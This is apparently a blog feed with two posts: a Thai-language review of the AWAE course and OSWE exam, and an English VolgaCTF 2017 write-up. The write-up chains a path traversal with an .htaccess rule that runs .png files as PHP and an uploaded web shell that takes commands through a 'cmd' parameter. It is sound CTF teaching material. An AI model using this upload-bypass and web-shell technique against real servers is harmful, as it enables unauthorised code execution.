tag:blogger.com,1999:blog-91543773614939663972024-03-16T08:09:15.529+07:00ICheer_No0MHacking | Security | Analysis | CTF Write-up.ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.comBlogger142125tag:blogger.com,1999:blog-9154377361493966397.post-88754940742074564222020-08-13T00:05:00.006+07:002020-10-02T15:24:02.406+07:00รีวิวคอร์ส AWAE และการสอบ OSWE Certification จากค่าย Offensive Security<p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihamPU2v6LC9-eJCPZ0pJ5esa-0GYQKIJsljdcMgxeQpQP9X3ZgYjizXcTcihsKpJEEf18K-YnnDKGudocRU_jEe2olcxw19k-c-z_zfZlNuXVk0HtfE_-Dx81j_Dl4b0CMOdpiJfe2Dzd/s500/awae_logo.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="446" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihamPU2v6LC9-eJCPZ0pJ5esa-0GYQKIJsljdcMgxeQpQP9X3ZgYjizXcTcihsKpJEEf18K-YnnDKGudocRU_jEe2olcxw19k-c-z_zfZlNuXVk0HtfE_-Dx81j_Dl4b0CMOdpiJfe2Dzd/s320/awae_logo.jpg" /></a></p><p></p><h3 style="text-align: left;"><b>AWAE คืออะไร?</b></h3><p style="text-align: justify;">AWAE ย่อมาจาก <a href="https://www.offensive-security.com/awae-oswe/" rel="nofollow" target="_blank">Advanced Web Attacks and Exploitation</a> เป็นหนึ่งในคอร์สสอนด้าน Cyber Security แบบออนไลน์ของค่าย Offensive Security ซึ่งเป็นผู้พัฒนาและดูแลโครงการ Kali Linux โดยเนื้อหาของคอร์สนี้มุ้งเน้นไปทาง White-box Web Application Penetration Testing หรือการทดสอบเจาะระบบเว็บแอพพลิเคชั่นแบบมีโค้ดของเว็บในภาษาต่างๆ ให้วิเคราะห์หาช่องโหว่และโจมตีไปยังเว็บเป้าหมาย รวมไปถึง Source Code Review หรือการหาช่องโหว่ด้านความปลอดภัยจาก Source Code นั่นเองครับ</p><h3 style="text-align: justify;"><b>AWAE Online?</b></h3><p style="text-align: justify;">ก่อนหน้านี้ผู้ที่สนใจคอร์สนี้หากมีความต้องการที่จะเรียนนั้น ผู้เรียนจะต้องเข้าเรียนในงานสัมมนา Black Hat ที่ถูกจัดขึ้นที่ต่างประเทศเท่านั้น (<a href="https://www.blackhat.com/asia-18/training/advanced-web-attacks-and-exploitation.html" rel="nofollow" target="_blank">Black Hat Asia 2018 | Advanced Web Attacks and Exploitation</a>) จนมาถึงเดือนมีนาคม 2019 ทาง Offensive Security ได้ประกาศว่าผู้ที่สนใจคอร์ส AWAE สามารถซื้อคอร์สและเรียนรู้ศึกษากันแบบ Online ได้แล้วดังเช่นคอร์ส Penetration Testing with Kali Linux (PWK) นั่นเอง โดยมีรายละเอียดดังนี้ครับ <a href="https://www.offensive-security.com/offsec/awae-now-available-anywhere-anytime/" rel="nofollow" target="_blank">AWAE Now Available Anywhere, Anytime</a></p><h3 style="text-align: justify;"><b>AWAE Course?</b></h3><p style="text-align: justify;">สิ่งที่คอร์สนี้ให้ผู้เรียนมาศึกษานั้นจะมี Materials ในรูปแบบ PDF ประมาณ 400+ หน้าและ Video ความยาวประมาณ 10 ชั่วโมงแก่ผู้เรียน และสิทธิ์ในการเข้าถึงเครือข่ายที่เป็นเครื่องสำหรับใช้ทดสอบฝึกฝน Lab เพื่อปฏิบัติตาม PDF และ Video อีกด้วยผ่านทาง VPN โดยระยะเวลาของการเข้าถึง Lab นั้นขึ้นกับรูปแบบที่ผู้เรียนได้ลงทะเบียนเรียนไว้เช่น 30, 60 หรือ 90 วันราคาก็จะแตกต่างกันออกไป และสามารถต่ออายุโดยการซื้อเพิ่มได้ครับ</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLI2KSf4ufDmsB3VTCdFNoJbPRd9WO_oIQfY4yV3fd5ffINOtvvT3VlTUcw3fEpKEwKEqew0Ev12iko9kfgxXZHXmgqfnIJyQARMJ9oirgxOz15eLYQaNEN-S4vc3kiSbJqXUSvAxLfFo/s1178/awae_pricing.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1178" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLI2KSf4ufDmsB3VTCdFNoJbPRd9WO_oIQfY4yV3fd5ffINOtvvT3VlTUcw3fEpKEwKEqew0Ev12iko9kfgxXZHXmgqfnIJyQARMJ9oirgxOz15eLYQaNEN-S4vc3kiSbJqXUSvAxLfFo/w400-h245/awae_pricing.jpg" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p style="text-align: justify;">เนื้อหาของคอร์สจะสอนการวิเคราะห์ Source Code ของเว็บแอพพลิเคชั่นในแต่ละภาษาโปรแกรมไม่ว่าจะเป็น PHP, .Net, Java, NodeJS, สอนการ Decompile, สอนการ Debug และสอนการแก้ไขค่า HTTP Request โดยในคอร์สจะสอนใช้เครื่องมือต่างๆ เช่น Burp Suite, dnSpy, JD-GUI เป็นต้น เนื้อหาของคอร์สจะมีประมาณนี้</p><p style="text-align: justify;"></p><ul><li>Web security tools and methodologies</li><li>Source code analysis</li><li>Persistent cross-site scripting</li><li>Session hijacking</li><li>.NET deserialization</li><li>Remote code execution</li><li>Blind SQL injections</li><li>Data exfiltration</li><li>Bypassing file upload restrictions and file extension filters</li><li>PHP type juggling with loose comparisons</li><li>PostgreSQL Extension and User Defined Functions</li><li>Bypassing REGEX restrictions</li><li>Magic hashes</li><li>Bypassing character restrictions</li><li>UDF reverse shells</li><li>PostgreSQL large objects</li></ul><p></p><p>เนื้อหาที่เพิ่มเข้ามาใหม่ <a href="https://www.offensive-security.com/offsec/awae-2020-update/" rel="nofollow" target="_blank">AWAE: Updated with More Content for 2020</a></p><p></p><ul style="text-align: left;"><li>DOM-based cross site scripting (black box)</li><li>Server side template injection</li><li>Weak random token generation</li><li>XML external entity injection</li><li>RCE via database functions</li><li>OS command injection via WebSockets (black box)</li></ul><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcBIrhY4igcEsIAAR2EgtwOX7ToKJhsdIJOiFh-jl1EFsrwxCsXSI6K7KWRJkSzwBIjEym9hvWRI1JLbzL9lxOysgxZjFfbHNIS28pghzPu4WXDCeVEcNjlXHn4IbcrC-7Jkf_10-tmmvM/s601/offsec.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="401" data-original-width="601" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcBIrhY4igcEsIAAR2EgtwOX7ToKJhsdIJOiFh-jl1EFsrwxCsXSI6K7KWRJkSzwBIjEym9hvWRI1JLbzL9lxOysgxZjFfbHNIS28pghzPu4WXDCeVEcNjlXHn4IbcrC-7Jkf_10-tmmvM/w400-h267/offsec.jpg" width="400" /></a></div><p style="text-align: center;">Credit from @0xklaue</p><p style="text-align: justify;">ผู้ที่สนใจสามารถอ่านเนื้อหาของคอร์สได้อย่างละเอียดที่นี่ครับ <a href="https://www.offensive-security.com/documentation/awae-syllabus.pdf" rel="nofollow" target="_blank">Advanced Web Attacks and Exploitation Syllabus</a> และสิ่งที่ผู้เขียนชอบใน Materials PDF คือจะมีส่วนของ Extra miles exercises คือการให้ผู้เรียนคิดนอกกรอบ คิดต่อยอดจากเรื่องที่ศึกษาไปแล้วในบทนั้นๆ โดยเป็นเหมือนการบ้านให้ศึกษาเพิ่มเติมและสามารถลงมือทำได้ใน Lab แต่เป็นการบ้านที่ไม่มีเฉลย</p><h3 style="text-align: justify;"><b>AWAE Lab?</b></h3><p style="text-align: justify;">สำหรับ Lab จะมีประมาณ 5 เครื่องเป็น 5 Web Application ให้ผู้เรียนได้เชื่อมต่อผ่าน VPN เข้าไปศึกษาและปฏิบัติตาม PDF และ Video สำหรับตอนนี้ได้มีการอัพเดทเนื้อหาของคอร์สแล้ว คิดว่าน่าจะมีเครื่องสำหรับฝึกฝนเพิ่มขึ้นอีกครับ</p><h3 style="text-align: justify;"><b>OSWE คืออะไร?</b></h3><p style="text-align: justify;">OSWE ย่อมาจาก Offensive Security Web Expert เป็นการสอบใบรับรองเพื่อวัดทักษะความรู้ความเข้าใจหลังจากศึกษาคอร์ส AWAE และพิสูจน์ว่าผู้เรียนสามารถใช้ความรู้ที่เรียนมาได้อย่างถูกต้องตามวัตถุประสงค์ของ AWAE ครับ โดยการสอบนั้นเป็นการสอบปฏิบัติแบบ Online ผ่านเครือข่าย VPN และมี Proctor หรือผู้คุมสอบคอยดูเราผ่านกล้อง Webcam และดูหน้าจอของเราตลอดเวลาระหว่างการสอบ ไม่ว่าผู้เรียนจะมีกี่หน้าจอก็ตาม ต้องแชร์ให้ผู้คุมสอบดูทั้งหมด ผู้เรียนจะมีเวลาในการสอบปฏิบัติทั้งสิ้น 47 ชั่วโมง 45 นาทีหรือประมาณเกือบ 2 วันในการสอบและ 24 ชั่วโมงหรือ 1 วันต่อมาในการเขียนรีพอร์ตส่งรวมๆ แล้วใช้เวลาเกือบ 3 วันในการสอบ OSWE ครับ เมื่อใกล้ถึงเวลาสอบทาง Offensive Security จะส่ง Credential ในการเชื่อมต่อ VPN มาให้และคำแนะนำเบื้องต้นในการตั้งค่า Webcam และพิสูจน์ตัวตน สำหรับผมคือแสดงบัตรประชาชนให้ทางผู้คุมสอบดูผ่านกล้อง Webcam ครับ</p><p style="text-align: justify;">ในการสอบทาง Offensive Security จะมี Main Objective หรือจุดประสงค์จำนวนหลายข้อให้เราทดสอบวัดทักษะความรู้และหนึ่งในนั้นคือ “การแฮกเว็บที่เป็นโจทย์ให้ได้” รวมไปถึงการเข้าถึงเนื้อหาในไฟล์ local.txt และไฟล์ proof.txt ที่อยู่ในเว็บ/เครื่องเป้าหมายเช่นเดียวกับการสอบ OSCP แต่ไม่ต้องทำการ Privilege Escalation เหมือน OSCP สำหรับเกณฑ์คะแนนที่ต้องได้รับสำหรับผ่านการสอบคือการ Submit เนื้อหาในไฟล์ local.txt และ proof.txt ลงใน Exam Control Panel ให้ได้ 85 คะแนนหรือมากกว่า จากคะแนนเต็ม 100 คะแนนครับ รายละเอียดระหว่างสอบขออนุญาตไม่กล่าวถึงเยอะครับ</p><h3 style="text-align: left;"><b>สำหรับข้อห้ามในการสอบจะมีดังนี้</b></h3><p></p><ul style="text-align: left;"><li>ไม่อนุญาตให้ใช้เครื่องมือวิเคราะห์ Source Code</li><li>ไม่อนุญาตให้ใช้เครื่องมือโจมตีช่องโหว่อัตโนมัติ (เช่น db_autopwn, browser_autopwn, SQLmap, SQLninja เป็นต้น)</li><li>ไม่อนุญาตให้ใช้เครื่องมือสแกนหาช่องโหว่อัตโนมัติ (เช่น Nessus, NeXpose, OpenVas, Canvas เป็นต้น)</li><li>แต่สามารถใช้เครื่องมืออย่าง Nmap รวมไปถึง NSE Script, Nikto, Burp Suite Free, DirBuster อันนี้ยกเว้นสามารถใช้ได้</li></ul><p></p><p><span style="text-align: justify;">Offensive Security ได้มี Template Report ให้สำหรับการสอบ OSWE โดย Report นั้นต้องประกอบไปด้วยขั้นตอนและวิธีการแต่ละ Step และควรอธิบายให้เข้าใจว่าทำแบบไหน ใช้คำสั่งอะไร ผลลัพธ์คืออะไร โดยมี Screetshot และรายละเอียดเยอะๆ จะดีมาก โดยสามารถอ่านเพิ่มเติมได้ที่ </span><a href="https://support.offensive-security.com/oswe-exam-guide/" rel="nofollow" style="text-align: justify;" target="_blank">OSWE Certification Exam Guide</a></p><h3 style="text-align: justify;"><b>อยากศึกษาคอร์ส AWAE และสอบ OSWE เตรียมตัวอย่างไรดี?</b></h3><p></p><ul style="text-align: left;"><li>ถ้าเคยสอบผ่าน OSCP จะมีประโยชน์ แต่คอร์สนี้ไม่จำเป็นต้องมี OSCP ก็ลงเรียนและสอบได้ครับ โดยสามารถอ่านรีวิวของ PWK/OSCP ได้ที่ <a href="https://web.facebook.com/notes/secure-d-global/penetration-testing-with-kali-pwk-review/170369820492714/" rel="nofollow" target="_blank">Penetration Testing with Kali (PWK) Review</a></li><li>ถ้าเป็น Web Developer หรือพัฒนาเขียนเว็บมาก่อน จะมีประโยชน์ในด้านการอ่านและทำความเข้าใจ Source Code</li><li>คุ้นชินกับการอ่านทำความเข้าใจโค้ดหรือเขียนโปรแกรมภาษาใดภาษาหนึ่งได้อย่างคล่องแคล่ว ไม่ว่าจะเป็น Java, .Net, JavaScript, Python</li><li>คุ้นชินกับการใช้งาน Linux ในด้านต่างๆ</li><li>ความสามารถในการเขียนสคริปของโปรแกรมในภาษาต่างๆ เช่น Python, Perl, PHP, Bash Script เพื่อ Automate Process สำหรับใช้โจมตี Web Application</li><li>มีประสบการณ์ในการใช้ Web Proxy เช่น Burp Suite เป็นต้น (ในคอร์สใช้ Burp Suite เป็นหลัก)</li><li>มีความรู้และเข้าใจวิธีการในการโจมตี Web Application ทั้งทางทฤษฏีและทางปฏิบัติเป็นอย่างดี</li></ul><p></p><h3 style="text-align: left;"><b>Exam Tips</b></h3><p></p><ul style="text-align: left;"><li>เนื้อหาในคอร์ส AWAE เพียงพอสำหรับการสอบผ่าน OSWE </li><li>พยายามทำ Extra miles exercises ให้ครบ จะช่วยผู้เรียนเวลาสอบได้มาก</li><li>เว็บเป้าหมายถูกพัฒนา/ปรับแต่งแก้ไขขึ้นเอง อย่าเสียเวลาไปหา Public Exploit หรือ CVE มาโจมตีหรือทดสอบ เพราะนี่ไม่ใช่ OSCP</li><li>เนื่องจากเนื้อหาของคอร์สมุ่งเน้นไปยัง White-box ผู้เรียนสามารถเปลี่ยนแปลงโค้ด, แก้ไขค่าใน Database หรือ Debug ได้อย่างอิสระในเครื่อง Debugging Machine ระหว่างการสอบ</li><li>พยายามทำความเข้าใจการทำงานและฟังก์ชั่นของเว็บแอพพลิเคชั่นให้ได้มากที่สุด แต่ไม่จำเป็นต้องอ่านโค้ดทุกบรรทัดหรือทุกไฟล์</li><li>อย่าลืมที่จะเก็บ Screenshot, โค้ดช่องโหว่บางส่วน หรือโน๊ตระหว่างการสอบ จะทำให้ไม่ลืม Step ที่ทำผ่านมา</li><li>อย่าลืมพักเบรคขณะสอบ อย่านั่งนานเกิน 2-3 ชั่วโมง ลุกจากคอมฯ ไปเดินเล่น กินขนม เล่นกับแมว</li><li>หากติดจุดไหนนานเกินไปให้เปลี่ยนแนวคิด เพราะนั่นอาจเป็น Rabbit Hole</li><li>ก่อนเริ่มสอบควรพักผ่อนให้เพียงพอ</li><li>อย่ายอมแพ้จนกว่าเวลาจะหมดลง</li><li>กำลังใจเป็นสิ่งที่สำคัญ 💪</li></ul><p></p><h3 style="text-align: left;"><b>Resources ที่น่าสนใจ</b></h3><p style="text-align: left;"><a href="https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside">https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside<br /></a><a href="https://github.com/timip/OSWE">https://github.com/timip/OSWE<br /></a><a href="https://github.com/wetw0rk/AWAE-PREP">https://github.com/wetw0rk/AWAE-PREP<br /></a><a href="https://github.com/deletehead/awae_oswe_prep">https://github.com/deletehead/awae_oswe_prep<br /></a><a href="https://kishanchoudhary.com/OSWE/Journey/OSWE.html">https://kishanchoudhary.com/OSWE/Journey/OSWE.html<br /></a><a href="https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/">https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/<br /></a><a href="https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/">https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/<br /></a><a href="https://owasp.org/www-pdf-archive/OWASP_Code_Review_Guide_v2.pdf">https://owasp.org/www-pdf-archive/OWASP_Code_Review_Guide_v2.pdf</a></p><p>หวังว่าจะเป็นประโยชน์กับคนที่สนใจครับผม 😀</p>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-50303776629105789652017-03-26T22:05:00.000+07:002017-03-26T23:07:30.901+07:00VolgaCTF 2017 Quals: Share Point (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
Look! I wrote a good service for sharing your files with your friends, enjoy)</blockquote>
<b>Solution:</b><br />
<b><br /></b>
1. Access to target and found login page, After login will appear <b>Upload</b>, <b>Files </b>and <b>Share </b>functions.<br />
<br />
Upload - Upload file.<br />
Files - List of files upload.<br />
Share - Share file upload to anothers user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rHRMJanjoVII4oRRs34EzssCd8USQ8eFocUvJ3NMhChylDXObhisUMKkPAL5pWejdfC81jlxCXyOKbL53YV327DQTVXmRUj0WHi1qRV0GnH6m6V4jyQcjTq9R-b7iZ6q2QWPLWGCB2fK/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rHRMJanjoVII4oRRs34EzssCd8USQ8eFocUvJ3NMhChylDXObhisUMKkPAL5pWejdfC81jlxCXyOKbL53YV327DQTVXmRUj0WHi1qRV0GnH6m6V4jyQcjTq9R-b7iZ6q2QWPLWGCB2fK/s400/1.PNG" width="400" /></a></div>
<br />
2. Try to upload PHP file, It not complete.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Ag3B-Cm-iXCHJbMO9jI2S1WVBmZWHwrA1empFkuv-trl71eMdouK4USs-RqNp7_vLSX_knfMTerumjmkMUy-aJxiNyw9PlnZ6LcW-X2pNDUfzNE09LVhj0MawN0YZ__IwrXElI2PkWjQ/s1600/2+upload+php.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Ag3B-Cm-iXCHJbMO9jI2S1WVBmZWHwrA1empFkuv-trl71eMdouK4USs-RqNp7_vLSX_knfMTerumjmkMUy-aJxiNyw9PlnZ6LcW-X2pNDUfzNE09LVhj0MawN0YZ__IwrXElI2PkWjQ/s400/2+upload+php.PNG" width="400" /></a></div>
<br />
3. Try to upload PNG image file and upload complete.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEAab58uk8UczZ7yRlennEXnkcPmuO28CNe21muQu_qGQ3dE4ab48j6gkYZNiWJYlAY-4Ad04oJFjZ6pVGXDkeGRXshra8bd9ik5PqTyoOxFpKVdz7jGv8M8Jpyi5tw1TvYUt8KLSN_I24/s1600/3+upload+png.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEAab58uk8UczZ7yRlennEXnkcPmuO28CNe21muQu_qGQ3dE4ab48j6gkYZNiWJYlAY-4Ad04oJFjZ6pVGXDkeGRXshra8bd9ik5PqTyoOxFpKVdz7jGv8M8Jpyi5tw1TvYUt8KLSN_I24/s400/3+upload+png.PNG" width="400" /></a></div>
<br />
4. I perform test a share function to share meme.png to another user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0EDoLA7hC3SGu_3H73vBqFzMDrkKDvwKO9CKsIJc05M-xObLWMrGmy_m-XLzZY2eBDIEQzXqNUud6cAxjjdxQHQ2qOHfzxtnI7qU0uGxhb0CV2z22faCu588Lvb2PP68zL_Pq5qf3gy_9/s1600/3.1+share+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0EDoLA7hC3SGu_3H73vBqFzMDrkKDvwKO9CKsIJc05M-xObLWMrGmy_m-XLzZY2eBDIEQzXqNUud6cAxjjdxQHQ2qOHfzxtnI7qU0uGxhb0CV2z22faCu588Lvb2PP68zL_Pq5qf3gy_9/s400/3.1+share+file.PNG" width="400" /></a></div>
<br />
5. Using Burp Suite to intercept request, in parameter <b>filename </b>is have vulnerable to <a href="https://www.owasp.org/index.php/Path_Traversal">Path Traversal</a>, I can share <b>../../index.php</b> to another user, and go to another user to read php file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdeZKKJYw_VVEGTGI9_VFQP4JpeaO7SH8ptT07RxbMxoSbNBbG3tkBarearelQIdQ8MJ1jXRoMyfSekVtH8tNoIEvXCn1Q1BERahDzpmxzg1OEMsAFQEu-qsiBqCSQRs7ezBn0bKtcszof/s1600/3.3+test+share+path+traversal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdeZKKJYw_VVEGTGI9_VFQP4JpeaO7SH8ptT07RxbMxoSbNBbG3tkBarearelQIdQ8MJ1jXRoMyfSekVtH8tNoIEvXCn1Q1BERahDzpmxzg1OEMsAFQEu-qsiBqCSQRs7ezBn0bKtcszof/s400/3.3+test+share+path+traversal.PNG" width="400" /></a></div>
<br />
6. In another user. I perform download index.php to my folder.<br />
Structure of folder: http://share-point.quals.2017.volgactf.ru/files/<b><username></b>/<b><file upload></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_RneRxkO8KA6DMRNd2G5z3x0aYCUzZqxrAd_tlSYfSHtMvCYoDwzsKiTJqEhK7D6T7rH3XFcAon0XwOKQv4CbdyKSeRr4AyzGD5ij2jQFMGMWm9QuIg6Y-VcTffRnG3iS6rMgc6t7Cp8/s1600/3.4+download+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_RneRxkO8KA6DMRNd2G5z3x0aYCUzZqxrAd_tlSYfSHtMvCYoDwzsKiTJqEhK7D6T7rH3XFcAon0XwOKQv4CbdyKSeRr4AyzGD5ij2jQFMGMWm9QuIg6Y-VcTffRnG3iS6rMgc6t7Cp8/s400/3.4+download+file.PNG" width="400" /></a></div>
<br />
7. List of file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLRC3Ofh7ZvsbJ7DPPiC99ZCvsUumNRV3pZ2av27daeX30Z7uXxIG1aiwY4m7KxNFVs73be-NuCsf6w0jI2ozpQaSUAvrU-YqdmcBrdaIBe8rcB4iwf0OifqeMy58grlBGegwEA8zkuziC/s1600/3.5+index+php+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLRC3Ofh7ZvsbJ7DPPiC99ZCvsUumNRV3pZ2av27daeX30Z7uXxIG1aiwY4m7KxNFVs73be-NuCsf6w0jI2ozpQaSUAvrU-YqdmcBrdaIBe8rcB4iwf0OifqeMy58grlBGegwEA8zkuziC/s400/3.5+index+php+file.PNG" width="400" /></a></div>
<br />
8. But when I access to index.php, It return <b>500 Internal Server Error</b>, Not work :(<br />
9. I think several minute and try to use <b>.htaccess</b> to process file ending with .png as .php!<br />
<br />
<b><i>AddType application/x-httpd-php .png</i></b><br />
<br />
10. Upload .htaccess and shell.png, in shell.png contain php code is a simple web shell that use <a href="http://php.net/manual/en/function.system.php">system</a> function.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-zLkq1HI-ldv-FP-kp22SQxhMxNJtm6mwmY6SSv5ZoCzQi9dGcoaGrBQL88z2Hf6TPmGx4l6Z8wZkAntUEQUykaTzOz61KqQJPoneOKwYrzZVf9BrsuzZTQsWt1-cAoIf9P7CJsnaLRaU/s1600/4.1+list+htaccess+php.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-zLkq1HI-ldv-FP-kp22SQxhMxNJtm6mwmY6SSv5ZoCzQi9dGcoaGrBQL88z2Hf6TPmGx4l6Z8wZkAntUEQUykaTzOz61KqQJPoneOKwYrzZVf9BrsuzZTQsWt1-cAoIf9P7CJsnaLRaU/s400/4.1+list+htaccess+php.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
11. Access to shell.png in http://share-point.quals.2017.volgactf.ru/files/<b><username></b>/<b>shell.png?cmd=<command></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSksoWfXCKqqLd6uMcVfG_6UkyOvVh-J0o69KIX1dCCfeCy0PW2x37-jLVyxMm5gWNijSy6uwYcdPusMQ2JysjEhyk0HmOGUEZLUCoupsHdGO0foEZQxGGrQO78Hc1GXJ7L0hLBE_pX5kh/s1600/5.1+ls.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSksoWfXCKqqLd6uMcVfG_6UkyOvVh-J0o69KIX1dCCfeCy0PW2x37-jLVyxMm5gWNijSy6uwYcdPusMQ2JysjEhyk0HmOGUEZLUCoupsHdGO0foEZQxGGrQO78Hc1GXJ7L0hLBE_pX5kh/s400/5.1+ls.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
12. Find a Flag, use command <b>find / -name "*flag*"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKEnFqkjpubvlS58w3r2xpDWqoDamy7IfRh2-hu_jnmZSBxblbK0p4yWaycy4ybMrOCZmPHwl9owz6BtVZce9zrwq80dhV0jyhD4oiqH6qO-Hvp5nuRkcjwGVjkwb-_4rFUrpy5PPfuWXJ/s1600/6+find+flag.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKEnFqkjpubvlS58w3r2xpDWqoDamy7IfRh2-hu_jnmZSBxblbK0p4yWaycy4ybMrOCZmPHwl9owz6BtVZce9zrwq80dhV0jyhD4oiqH6qO-Hvp5nuRkcjwGVjkwb-_4rFUrpy5PPfuWXJ/s400/6+find+flag.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
13. <b>cat /opt/flag.txt</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTREmKWG49PbYyfNmPT_LrMtoERr-hXYwb0NwYBYKKNRpGZeb6FLne53q6ujegZMcYKZlU5LoMaMq-tGlYaFuUSWI13hp8TCyDXMnhIwgmsGzzBtuDhJ1mPzsW11BJ3Pjjzzjxuhgqrf9/s1600/7+found+flag.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTREmKWG49PbYyfNmPT_LrMtoERr-hXYwb0NwYBYKKNRpGZeb6FLne53q6ujegZMcYKZlU5LoMaMq-tGlYaFuUSWI13hp8TCyDXMnhIwgmsGzzBtuDhJ1mPzsW11BJ3Pjjzzjxuhgqrf9/s400/7+found+flag.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>My Automate Script:</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<script src="https://gist.github.com/icheernoom/0aa2e2fc35a66cf12e7e6949569c0d94.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRLUZe2w2p5Zc_X9GvkwmGZat3xbi_mGsvzSwCERmzF0mf_VrXn1Cly4wriyCZmMbkr64xkA9kmFJ4zev1hZXgQZRcKeLt-qYzFJ-cm24PqobnK4vzwyqzKF2lE07qjK8HuIaSDvJVIk8P/s1600/powershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRLUZe2w2p5Zc_X9GvkwmGZat3xbi_mGsvzSwCERmzF0mf_VrXn1Cly4wriyCZmMbkr64xkA9kmFJ4zev1hZXgQZRcKeLt-qYzFJ-cm24PqobnK4vzwyqzKF2lE07qjK8HuIaSDvJVIk8P/s400/powershell.png" width="380" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
